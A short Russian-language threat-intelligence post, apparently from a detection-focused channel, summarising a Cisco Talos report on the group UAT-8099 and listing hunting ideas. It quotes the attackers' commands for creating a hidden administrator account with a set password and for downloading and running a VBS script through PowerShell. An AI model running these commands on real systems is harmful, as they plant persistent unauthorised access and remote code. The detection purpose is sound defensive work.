Cisco Talos опубликовали отчет о TTP группировки UAT-8099
👨💻 Как это работает?
🔤 После получения доступа выполняют команды для анализа хоста -
whoami, tasklist🔤 Для закрепления устанавливают SoftEther VPN и создают учетную запись, маскирующуюся под сервисную,
mssql$ (в дальнейшем логин менялся, однако IOA оставался тем же)
cmd /c net user mssql$ AppleHuitar7$ /add
cmd /c net localgroup administrators mssql$ /add
cmd /c net user mssql$ /expires:never
🔤 Один из инструментов атакующих - GotoHTTP
Загружают через PowerShell
Invoke-WebRequest https://.*/*.vbsи запускают
cmd /c C:\Users\Public\zcgo1.vbs🔤 Конечная цель атакующих — внедрение кода в IIS
🔭 Обнаружение:
🔤 отслеживаем запуск
whoami и net user|localgroup🔤 хантим и отслеживаем создание пользовательских учетных записей с последним символом
$🔤 отслеживаем
EventId=4624 and LogonType in [3, 10] and TargetUserName endswith $🔤 мониторим использование RMM Tool
🔤 отслеживаем запуск дочерних процессов (cmd.exe, powershell.exe, etc) от родителя
w3wp.exe🔤 отслеживаем создание новых
*.aspx🔤 создание странных файлов в
C:\Users\Public#detection@detectioneasy
#ttp@detectioneasy